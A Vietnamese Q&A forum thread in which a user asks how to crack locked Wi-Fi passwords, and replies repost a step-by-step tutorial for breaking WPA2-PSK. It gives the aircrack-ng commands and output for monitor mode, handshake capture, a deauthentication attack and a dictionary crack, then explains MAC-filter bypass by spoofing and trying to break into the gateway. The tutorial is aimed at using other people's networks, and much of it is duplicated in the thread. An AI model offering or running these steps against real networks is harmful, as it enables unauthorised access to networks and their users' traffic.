Câu hỏi

28/05/2013 07:46
Hack wifi
cac bac nao co phan mem hack wifi Em mớimua được cái latop nhưng đi đâu wifi cũng bị khóa hết , bác nào biết cách "bẻ" pass chỉ em với dc ko em tim mai nhung phan mem ko hack dc
Xman
28/05/2013 07:46
Thực ra lúc trước mình tưởng ********/hack wireless khó lắm cơ, nhưng khi thử với blacktrack thì thấy cực kỳ đơn giản. Bạn có thể làm theo như hướng dẫn trên, hướng dẫn trên là dùng blacktrack 2, bây giờ nó có bản blacktrack 3 beta rồi, các bạn có thể lên google search black track 3 là có ngay thôi. Nhớ search dưới dạng file iso nhé, download về chép ra đĩa CD ( làm đĩa boot), chép rồi ra boot từ CD, nó sẽ logon vào màn hình như linux, từ đó bạn tha hồ mà vọc với chỉ dẫn o trên. Mình đã test thử với wireless nhà mình, hiệu quả 100%. Điều chú ý để ******** được pass của wireless thì ******** được khi có máy người khác truy cập vào mạng ( wireless mình muốn hack), nếu ko có ai vào thì đành chịu thôi ( các bạn thử rồi sẽ biết tại sao thôi). Mình có test nhiều tool hack dùng trên window nhưng những tool này chỉ hỗ trợ có mấy loại card wireless thôi, bởi thế khó ******** hơn dùng những chương trình chạy trên CD luôn ( blacktrack, auditor...).
Về thằng Auditor thì mình chịu nó thôi, có lẽ nó chỉ hỗ trợ cho card mạng xài chíp intel hay sao ấy, mình boot từ CD thì ko chịu vào giao diện linux mà làm treo máy luôn. mình đã thử tạo một máy ảo trên window luôn, máy ảo này cài linux Ubuntu 8.04, khi boot từ đĩa Auditor cho máy ảo thì nó có vào được giao diện linux nhưng lại ko nhận được card mạng không dây ( Hình như thằng máy ảo ko nhận card wireless hay sao ấy - mình boot thử blacktrack trên máy ảo cũng ko nhận ra luôn, hjc hjc boot từ máy thật thì nhận được).
Thằng Auditor và blacktrack là mình thấy hack đơn giản nhất ( theo hướng dẫn thôi, mới test blacktrack thôi), mình đang kiếm thử cách cài driver wireless vào Ubuntu mà ko được, anh nào biết chỉ em với ( mới tập tành xài linux nên cũng chưa biết gì, hjc hjc).
Danh sách câu trả lời (6)

Trích dẫn:
hack wifi không phải là không thể được,nhưng tiến trình thực hiện khá phức tạp,mình xin trình bày lại bài viết của pác TranDuyNinh trên diễn đàn HVAOnline (xin lỗi các mod tại ddth nhé!!)
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn ******** wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn
công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google
mac adress của máy tấn công :00:0F:B5:88:AC:82
mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2
mac adress của acssespoint : 00:14:6C:7E:40:80
tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0
bước 1 : chuyển wireless card qua chế độ monitor
ifconfig eth0 up
iwconfig eth0 mode monitor
iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bước 2 : run airodum-ng để collect authentical :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
khi thành công bạn được như sau :
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file.
bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )
nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều :
run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn :
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
khi thành công :
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
sau đó là đợi , càng lâu càng tốt nha
cuối cùng run aircrack-ng để ******** :
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
khi thành công :
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
vậy là có thể ******** thành công wpa rồi
lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ ******** nha
VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được
muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó :
bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac"
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn ******** wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn
công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google
mac adress của máy tấn công :00:0F:B5:88:AC:82
mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2
mac adress của acssespoint : 00:14:6C:7E:40:80
tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0
bước 1 : chuyển wireless card qua chế độ monitor
ifconfig eth0 up
iwconfig eth0 mode monitor
iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bước 2 : run airodum-ng để collect authentical :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
khi thành công bạn được như sau :
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file.
bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )
nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều :
run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn :
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
khi thành công :
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
sau đó là đợi , càng lâu càng tốt nha
cuối cùng run aircrack-ng để ******** :
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
khi thành công :
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
vậy là có thể ******** thành công wpa rồi
lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ ******** nha
VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được
muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó :
bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac"
Thực ra lúc trước mình tưởng ********/hack wireless khó lắm cơ, nhưng khi thử với blacktrack thì thấy cực kỳ đơn giản. Bạn có thể làm theo như hướng dẫn trên, hướng dẫn trên là dùng blacktrack 2, bây giờ nó có bản blacktrack 3 beta rồi, các bạn có thể lên google search black track 3 là có ngay thôi. Nhớ search dưới dạng file iso nhé, download về chép ra đĩa CD ( làm đĩa boot), chép rồi ra boot từ CD, nó sẽ logon vào màn hình như linux, từ đó bạn tha hồ mà vọc với chỉ dẫn o trên. Mình đã test thử với wireless nhà mình, hiệu quả 100%. Điều chú ý để ******** được pass của wireless thì ******** được khi có máy người khác truy cập vào mạng ( wireless mình muốn hack), nếu ko có ai vào thì đành chịu thôi ( các bạn thử rồi sẽ biết tại sao thôi). Mình có test nhiều tool hack dùng trên window nhưng những tool này chỉ hỗ trợ có mấy loại card wireless thôi, bởi thế khó ******** hơn dùng những chương trình chạy trên CD luôn ( blacktrack, auditor...).
Về thằng Auditor thì mình chịu nó thôi, có lẽ nó chỉ hỗ trợ cho card mạng xài chíp intel hay sao ấy, mình boot từ CD thì ko chịu vào giao diện linux mà làm treo máy luôn. mình đã thử tạo một máy ảo trên window luôn, máy ảo này cài linux Ubuntu 8.04, khi boot từ đĩa Auditor cho máy ảo thì nó có vào được giao diện linux nhưng lại ko nhận được card mạng không dây ( Hình như thằng máy ảo ko nhận card wireless hay sao ấy - mình boot thử blacktrack trên máy ảo cũng ko nhận ra luôn, hjc hjc boot từ máy thật thì nhận được).
Thằng Auditor và blacktrack là mình thấy hack đơn giản nhất ( theo hướng dẫn thôi, mới test blacktrack thôi), mình đang kiếm thử cách cài driver wireless vào Ubuntu mà ko được, anh nào biết chỉ em với ( mới tập tành xài linux nên cũng chưa biết gì, hjc hjc).
Trả lời câu hỏi
Câu hỏi lĩnh vực Câu hỏi khác
Rao vặt Siêu Vip